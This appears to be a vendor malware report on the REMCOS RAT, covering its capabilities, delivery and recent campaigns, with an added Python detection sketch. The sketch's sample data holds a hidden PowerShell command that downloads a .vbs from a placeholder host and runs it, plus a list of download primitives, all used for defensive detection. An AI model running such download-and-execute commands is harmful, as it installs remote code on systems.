Overview

REMCOS RAT is a remote access trojan that has been widely used in cybercriminal and espionage campaigns. It can take control of an infected computer, capture keystrokes, audio, video, screenshots and system data, and deliver additional malware payloads. It is typically delivered through phishing emails with malicious attachments or links that install the RAT, and has also been observed being delivered by the DBatLoader and GuLoader malware loaders. The malware is sold commercially by Breaking Security but has been used for malicious purposes since the mid-2010s.

It has been observed in various parts of the world and is known for its stealthy behaviour, including the use of public cloud infrastructure and anti-analysis techniques. The most recent events involving REMCOS RAT include a phishing campaign targeting Eastern European institutions and businesses with DBatLoader and REMCOS RAT in March 2023, and a new campaign targeting US accounting and tax return preparation firms ahead of Tax Day in April 2023. In recent months there have also been several reports of REMCOS being used in campaigns targeting Ukrainian government entities and organisations in Eastern Europe.

REMCOS intrusions begin with brute force attacks against insecure servers to gain access, after which the attacker takes control of the PowerShell utility and uses it to download and install an obfuscated Visual Basic script file, which is then executed. Once the malware is running, a wide range of capabilities can be used, such as screen capture, keylogging and many more.
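The delivery chain described above (PowerShell fetching a .vbs, then a script host running it) can be looked for in process-creation telemetry. The following is an added detection sketch, not code from the report or from Quorum Cyber; it assumes Sysmon-style process events with pid, parent pid, image name and command line, and the events it runs over are constructed samples, not real logs.

```python
"""Detection sketch for the REMCOS delivery chain: PowerShell downloading a
.vbs file, then wscript/cscript executing that .vbs as a child of PowerShell.
Events are constructed sample data shaped like Sysmon Event ID 1 fields."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case (assumed normalised upstream)
    cmdline: str


# Constructed sample events (not real telemetry). 200 -> 201 is the suspicious chain;
# 300 is a .vbs launched by a benign parent, 400 is ordinary PowerShell use.
SAMPLE_EVENTS = [
    ProcessEvent(100, 4, "services.exe", "C:\\Windows\\System32\\services.exe"),
    ProcessEvent(200, 100, "powershell.exe",
                 "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://example.invalid/a.vbs','C:\\Users\\Public\\a.vbs')\""),
    ProcessEvent(201, 200, "wscript.exe", "wscript.exe C:\\Users\\Public\\a.vbs"),
    ProcessEvent(300, 100, "wscript.exe", "wscript.exe C:\\Scripts\\logon.vbs"),
    ProcessEvent(400, 100, "powershell.exe", "powershell -c Get-Service"),
]

# Common download primitives seen in PowerShell command lines (hypothetical, not exhaustive).
DOWNLOAD_RE = re.compile(r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)", re.I)
VBS_RE = re.compile(r"\.vbs\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def find_remcos_chain(events):
    """Return (pid, reason) tuples for events matching either stage of the chain."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        # Stage 1: PowerShell whose command line both downloads and names a .vbs file.
        if e.image == "powershell.exe" and DOWNLOAD_RE.search(e.cmdline) and VBS_RE.search(e.cmdline):
            hits.append((e.pid, "powershell downloading a .vbs"))
        # Stage 2: script host running a .vbs whose parent process is PowerShell.
        parent = by_pid.get(e.ppid)
        if (e.image in SCRIPT_HOSTS and VBS_RE.search(e.cmdline)
                and parent is not None and parent.image == "powershell.exe"):
            hits.append((e.pid, "script host running .vbs spawned by powershell"))
    return hits


if __name__ == "__main__":
    for pid, reason in find_remcos_chain(SAMPLE_EVENTS):
        print(pid, reason)
```

Only the two events of the constructed chain (pids 200 and 201) are flagged; the benign logon script and the plain PowerShell command are not.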

Impact

If REMCOS is successfully executed, it gives the threat actor full control and surveillance of the target system, allowing them to exfiltrate sensitive data over a potentially long period of time if undetected. Depending on the target, use of this sensitive data could lead to victims being blackmailed, to loss of employment if company data is involved, and to stolen organisational data being used to launch a large-scale, sophisticated attack. It is likely that this would lead to irreparable damage to organisations or individuals' livelihoods.

Further Malware Reports from Quorum Cyber

Headquarters

Verdant
2 Redheughs Rigg
Edinburgh
United Kingdom
EH12 9DQ